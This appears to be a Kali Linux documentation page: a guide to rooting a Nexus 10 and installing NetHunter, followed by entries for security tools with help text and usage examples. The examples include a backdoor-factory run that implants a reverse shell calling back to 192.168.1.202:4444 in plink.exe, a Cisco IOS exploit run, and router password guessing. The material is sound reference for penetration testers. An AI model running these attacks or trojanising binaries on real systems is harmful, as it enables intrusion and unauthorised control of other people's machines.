Installing Kali NetHunter on Nexus 10 Tablet

Installation using a Windows PC

  1. If you already have a rooted device, skip to step 22
  2. Download the Android SDK package from https://developer.android.com/sdk/index.html
  3. Install the SDK to the computer that will be rooting the device
  4. Open Android Studio and navigate to SDK Manager > SDK Tools and install the Google USB Driver if it isn’t installed already
  5. Note down the SDK’s tools path, it should look something like C:\Users\XXXXXX\AppData\Local\Android\sdk\platform-tools
  6. Right-click on My Computer, select Properties > Advanced system settings > Environment variables
  7. Find the ‘Path’ variable under ‘System variables’, select ‘Edit’, add a semi-colon to the end of what’s there, followed by the SDK tools path. (If the Path variable doesn’t exist, create it and set it as the SDK tools path)
  8. On the tablet navigate to Settings > About, then tap on ‘Build number’ 7 times to activate Developer Mode
  9. Navigate back to Settings, then Developer Options and enable USB debugging
  10. If it isn’t already, connect the tablet to the PC that has the SDK installed on
  11. Open Device Manager, select the device, right-click and then navigate to Properties > Driver > Update Driver > Browse my computer for driver software > Browse…
  12. Set the directory to the SDK directory, followed by /extras/google/usb_driver
  13. Select ‘Next’ and the device should then be recognised as an Android/Nexus device
  14. Repeat steps 11-13 for any Android/Nexus devices without drivers
  15. Open up a command prompt window (cmd), and then run:
    fastboot oem unlock
    adb reboot-bootloader
  16. Go to https://twrp.me/devices/samsungnexus10.html and download the most recent TWRP image for the Nexus 10 tablet (2.8.7.0 manta as of now)
  17. Navigate to where the image is downloaded to in the command prompt window, and then run:
    fastboot flash recovery twrp-2.8.7.0-manta.img
  18. Go to https://autoroot.chainfire.eu/ and download the rooter for the Nexus 10 manta
  19. Extract the downloaded ZIP, navigate to the folder in the command prompt window and then run:
    root-windows.bat
  20. Follow the instructions on screen, read carefully before accepting
  21. The device should now be rooted and ready to install Kali NetHunter
  22. Go to https://www.offensive-security.com/kali-linux-nethunter-download/ and download the Kali NetHunter for Nexus 10 for your Android version
  23. Make sure the device is still connected, then in a command prompt window run the following command, making sure to replace the directory and file name correctly:
    adb push C:/Users/XXXXXX/Downloads/kali_nethunter.zip /data/local/tmp/kali_nethunter.zip
  24. Once that is complete, put the tablet back into bootloader mode by running:
    adb reboot-bootloader
  25. Use the volume +/- buttons to change the boot option to ‘Recovery Mode’, and then press the power button to select it
  26. Select ‘Install’, navigate to the root directory and then /data/local/tmp
  27. Select the Kali NetHunter zip, and then begin the flash
  28. Once the Kali NetHunter installation is complete, press ‘Reboot System’ to reboot the device

Installing Kali Linux 2

Installing Kali in VM Fusion (Mac)

The following video shows the steps to install the base build of Kali linux using VMWare Fusion 8 Pro. This will run you through a graphical installation from start to finish.

Video Tutorial

Updating Kali via Command Line

The following video shows how to update Kali Linux via the command line.

Video Tutorial

Installing VM Tools in Kali Linux

The following video shows how to install VM Tools into Kali Linux.

Video Tutorial

Capstone

Tool Description

Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community. Created by Nguyen Anh Quynh, then developed and maintained by a small community, Capstone offers some unparalleled features:

  • Support multiple hardware architectures: ARM, ARM64 (aka ARMv8), Mips & X86
  • Having clean/simple/lightweight/intuitive architecture-neutral API
  • Provide details on disassembled instruction (called “decomposer” by others)
  • Provide semantics of the disassembled instruction, such as list of implicit registers read & written
  • Implemented in pure C language, with lightweight wrappers for C++, Python, Ruby, OCaml, C#, Java and Go available
  • Native support for Windows & *nix platforms (MacOSX, Linux & *BSD confirmed)
  • Thread-safe by design.

Tool Source: http://www.capstone-engine.org/index.html

Kali Repo: http://git.kali.org/gitweb/?p=packages/capstone.git;a=summary

Video Tutorial: Coming Soon!

bulk-extractor – Extracts information without parsing filesystem

Tool Description

bulk_extractor is a program that extracts features such as email addresses, credit card numbers, URLs, and other types of information from digital evidence files. It is a useful forensic investigation tool for many tasks such as malware and intrusion investigations, identity investigations and cyber investigations, as well as analyzing imagery and pass-word cracking. The program provides several unusual capabilities including:

  • It finds email addresses, URLs and credit card numbers that other tools miss because it can process compressed data (like ZIP, PDF and GZIP files) and incomplete or partially corrupted data. It can carve JPEGs, office documents and other kinds of files out of fragments of compressed data. It will detect and carve encrypted RAR files.
  • It builds word lists based on all of the words found within the data, even those in compressed files that are in unallocated space. Those word lists can be useful for password cracking.
  • It is multi-threaded; running bulk_extractor on a computer with twice the number of cores typically makes it complete a run in half the time.
  • It creates histograms showing the most common email addresses, URLs, domains, search terms and other kinds of information on the drive.

bulk_extractor operates on disk images, files or a directory of files and extracts useful information without parsing the file system or file system structures. The input is split into pages and processed by one or more scanners. The results are stored in feature files that can be easily inspected, parsed, or processed with other automated tools.
bulk_extractor also creates histograms of features that it finds. This is useful because features such as email addresses and internet search terms that are more common tend to be important.
In addition to the capabilities described above, bulk_extractor also includes:

  • A graphical user interface, Bulk Extractor Viewer, for browsing features stored in feature files and for launching bulk_extractor scans
  • A small number of python programs for performing additional analysis on feature files

Tool Source: https://github.com/simsong/bulk_extractor/

Kali Repo: http://git.kali.org/gitweb/?p=packages/bulk-extractor.git;a=summary

General Details

root@kali:~# bulk_extractor
bulk_extractor version 1.3 $Rev: 10606 $
Usage: bulk_extractor [options] imagefile
  runs bulk extractor and outputs to stdout a summary of what was found where

Required parameters:
   imagefile     - the file to extract
 or  -R filedir  - recurse through a directory of files
                  SUPPORT FOR E01 FILES COMPILED IN
                  SUPPORT FOR AFF FILES COMPILED IN
   -o outdir    - specifies output directory. Must not exist.
                  bulk_extractor creates this directory.
Options:
   -b banner.txt- Add banner.txt contents to the top of every output file.
   -r alert_list.txt  - a file containing the alert list of features to alert
                       (can be a feature file or a list of globs)
                       (can be repeated.)
   -w stop_list.txt   - a file containing the stop list of features (white list
                       (can be a feature file or a list of globs)s
                       (can be repeated.)
   -F <rfile>   - Read a list of regular expressions from <rfile> to find
   -f <regex>   - find occurrences of <regex>; may be repeated.
                  results go into find.txt
   -q nn        - Quiet Rate; only print every nn status reports. Default 0; -1 for no status at all

Tuning parameters:
   -C NN         - specifies the size of the context window (default 16)
   -G NN         - specify the page size (default 16777216)
   -g NN         - specify margin (default 4194304)
   -W n1:n2      - Specifies minimum and maximum word size
                  (default is -w6:14)
   -B NN         - Specify the blocksize for bulk data analysis (default 512)
   -j NN         - Number of analysis threads to run (default 2)
   -M nn        - sets max recursion depth (default 5)

Path Processing Mode:
   -p <path>/f  - print the value of <path> with a given format.
                  formats: r = raw; h = hex.
                  Specify -p - for interactive mode.
                  Specify -p -http for HTTP mode.

Parallelizing:
   -Y <o1>      - Start processing at o1 (o1 may be 1, 1K, 1M or 1G)
   -Y <o1>-<o2> - Process o1-o2
   -A <off>     - Add <off> to all reported feature offsets

Debugging:
   -h           - print this message
   -H           - print detailed info on the scanners
   -V           - print version number
   -z nn        - start on page nn
   -dN          - debug mode (see source code
   -Z           - zap (erase) output directory

Control of Scanners:
   -P <dir>     - Specifies a plugin directory
   -E scanner   - turn off all scanners except scanner
   -m <max>     - maximum number of minutes to wait for memory starvation
                  default is 60
   -s name=value - sets a bulk extractor option name to be value

   -e bulk - enable scanner bulk
   -e wordlist - enable scanner wordlist

   -x accts - disable scanner accts
   -x aes - disable scanner aes
   -x base16 - disable scanner base16
   -x base64 - disable scanner base64
   -x elf - disable scanner elf
   -x email - disable scanner email
   -x exif - disable scanner exif
   -x gps - disable scanner gps
   -x gzip - disable scanner gzip
   -x hiber - disable scanner hiber
   -x json - disable scanner json
   -x kml - disable scanner kml
   -x net - disable scanner net
   -x pdf - disable scanner pdf
   -x vcard - disable scanner vcard
   -x windirs - disable scanner windirs
   -x winpe - disable scanner winpe
   -x winprefetch - disable scanner winprefetch
   -x zip - disable scanner zip

 Usage Example

Extract files to the output directory (-o bulk-out) after analyzing the image file (xp-laptop-2005-07-04-1430.img):

root@kali:~# bulk_extractor -o bulk-out xp-laptop-2005-07-04-1430.img 
bulk_extractor version: 1.3
Hostname: kali
Input file: xp-laptop-2005-07-04-1430.img
Output directory: bulk-out
Disk Size: 536715264
Threads: 1
Phase 1.
13:02:46 Offset 0MB (0.00%) Done in n/a at 13:02:45
13:03:39 Offset 67MB (12.50%) Done in  0:06:14 at 13:09:53
13:04:43 Offset 134MB (25.01%) Done in  0:05:50 at 13:10:33
13:04:55 Offset 201MB (37.51%) Done in  0:03:36 at 13:08:31
13:06:01 Offset 268MB (50.01%) Done in  0:03:15 at 13:09:16
13:06:48 Offset 335MB (62.52%) Done in  0:02:25 at 13:09:13
13:07:04 Offset 402MB (75.02%) Done in  0:01:25 at 13:08:29
13:07:20 Offset 469MB (87.53%) Done in  0:00:39 at 13:07:59
All Data is Read; waiting for threads to finish...
Time elapsed waiting for 1 thread to finish:
     (please wait for another 60 min .)
Time elapsed waiting for 1 thread to finish:
    6 sec (please wait for another 59 min 54 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    12 sec (please wait for another 59 min 48 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    18 sec (please wait for another 59 min 42 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    24 sec (please wait for another 59 min 36 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    30 sec (please wait for another 59 min 30 sec.)
Thread 0: Processing 520093696

All Threads Finished!
Producer time spent waiting: 335.984 sec.
Average consumer time spent waiting: 0.143353 sec.
*******************************************
** bulk_extractor is probably CPU bound. **
**    Run on a computer with more cores  **
**      to get better performance.       **
*******************************************
Phase 2. Shutting down scanners
Phase 3. Creating Histograms
   ccn histogram...   ccn_track2 histogram...   domain histogram...
   email histogram...   ether histogram...   find histogram...
   ip histogram...   tcp histogram...   telephone histogram...
   url histogram...   url microsoft-live...   url services...
   url facebook-address...   url facebook-id...   url searches...

Elapsed time: 378.5 sec.
Overall performance: 1.418 MBytes/sec.
Total email features found: 899

Video Tutorial: Coming Soon!

BeEF – Browser exploitation framework

Tool Description

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tool Source: http://beefproject.com/

Kali Repo: http://git.kali.org/gitweb/?p=packages/beef-xss.git;a=summary

Video Tutorial: Coming Soon!

 

backdoor-factory – Patch win32/64 binaries with shellcode

Tool Description

The goal of BDF is patch executable binaries with user desired shellcode and continue normal execution of the pre patched state.

Supporting: Windows PE x32/x64 and Linux ELF x32/x64 (System V)

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises.

Tool Source: https://github.com/secretsquirrel/the-backdoor-factory/

Kali Repo: http://git.kali.org/gitweb/?p=packages/backdoor-factory.git;a=summary

General Details

root@kali:~# backdoor-factory
-.(`-')  (`-')  _           <-.(`-') _(`-')                            (`-')
__( OO)  (OO ).-/  _         __( OO)( (OO ).->     .->        .->   <-.(OO )
'-'---.\  / ,---.   \-,-----.'-'. ,--.\    .'_ (`-')----. (`-')----. ,------,)
| .-. (/  | \ /`.\   |  .--./|  .'   /'`'-..__)( OO).-.  '( OO).-.  '|   /`. '
| '-' `.) '-'|_.' | /_) (`-')|      /)|  |  ' |( _) | |  |( _) | |  ||  |_.' |
| /`'.  |(|  .-.  | ||  |OO )|  .   ' |  |  / : \|  |)|  | \|  |)|  ||  .   .'
| '--'  / |  | |  |(_'  '--'\|  |\   \|  '-'  /  '  '-'  '  '  '-'  '|  |\  \
`------'  `--' `--'   `-----'`--' '--'`------'    `-----'    `-----' `--' '--'
           (`-')  _           (`-')                   (`-')
   <-.     (OO ).-/  _        ( OO).->       .->   <-.(OO )      .->
(`-')-----./ ,---.   \-,-----./    '._  (`-')----. ,------,) ,--.'  ,-.
(OO|(_\---'| \ /`.\   |  .--./|'--...__)( OO).-.  '|   /`. '(`-')'.'  /
 / |  '--. '-'|_.' | /_) (`-')`--.  .--'( _) | |  ||  |_.' |(OO \    /
 \_)  .--'(|  .-.  | ||  |OO )   |  |    \|  |)|  ||  .   .' |  /   /)
  `|  |_)  |  | |  |(_'  '--'\   |  |     '  '-'  '|  |\  \  `-/   /`
   `--'    `--' `--'   `-----'   `--'      `-----' `--' '--'   `--'

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr

         v2.0.6

Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.

 Usage Example

Specify the binary to backdoor (-f /usr/share/windows-binaries/plink.exe), set the connect-back IP (-H 192.168.1.202), the connect-back port (-P 4444), and the shell to use (-s reverse_shell_tcp):

root@kali:~# backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \ 
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________              __                               
\_   _____/____    _____/  |_  ___________ ___.__.        
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |        
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |        
 \___  /  (____  /\___  >__|  \____/|__|   / ____|        
     \/        \/     \/                   \/             

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr
         
         v2.0.6 
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 358
[*] All caves lengths:  (358,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, or append.**
############################################################
[*] Cave 1 length as int: 358
[*] Available caves: 
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x280 End: 0x1000; Cave Size: 3456
2. Section Name: .text; Section Begin: 0x1000 End: 0x37000; Cave begin: 0x36981 End: 0x37000; Cave Size: 1663
3. Section Name: None; Section Begin: None End: None; Cave begin: 0x47cec End: 0x48004; Cave Size: 792
4. Section Name: .data; Section Begin: 0x48000 End: 0x4a000; Cave begin: 0x48961 End: 0x48b90; Cave Size: 559
5. Section Name: None; Section Begin: None End: None; Cave begin: 0x4907c End: 0x4a00e; Cave Size: 3986
**************************************************
[!] Enter your selection: 2
Using selection: 2
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] /usr/share/windows-binaries/plink.exe backdooring complete
File /usr/share/windows-binaries/plink.exe is in the 'backdoored' directory

Video Tutorial: Coming Soon!

 

cisco-global-exploiter – Simple and fast security testing tool

Tool Description

Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool.

Tool Source: http://www.blackangels.it/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-global-exploiter.git;a=summary

General Details

root@kali:~# cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

Usage Example

Attack the target host (192.168.99.230) using the Cisco IOS HTTP Auth Vulnerability (3):

root@kali:~# cge.pl 192.168.99.230 3

Vulnerability successful exploited with [http://192.168.99.230/level/17/exec/....] ...

 Video Tutorial: Coming Soon!

cisco-auditing-tool – Scans Cisco routers for common vulnerabilities

Tool Description

Perl script which scans cisco routers for common vulnerabilities.

Tool Source: http://www.scrypt.net/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary

General Details

root@kali:~# CAT

Cisco Auditing Tool - g0ne [null0]
Usage:
    -h hostname (for scanning single hosts)
    -f hostfile (for scanning multiple hosts)
    -p port #   (default port is 23)
    -w wordlist (wordlist for community name guessing)
    -a passlist (wordlist for password guessing)
    -i [ioshist]    (Check for IOS History bug)
    -l logfile  (file to log to, default screen)
    -q quiet mode   (no screen output)

Usage Example

Scan the host (-h 192.168.99.230) on port 23 (-p 23), using a password dictionary file (-a /usr/share/wordlists/nmap.lst):

root@kali:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst 

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.99.230


Guessing passwords: 

Invalid Password: 123456
Invalid Password: 12345

Video Tutorial: Coming Soon!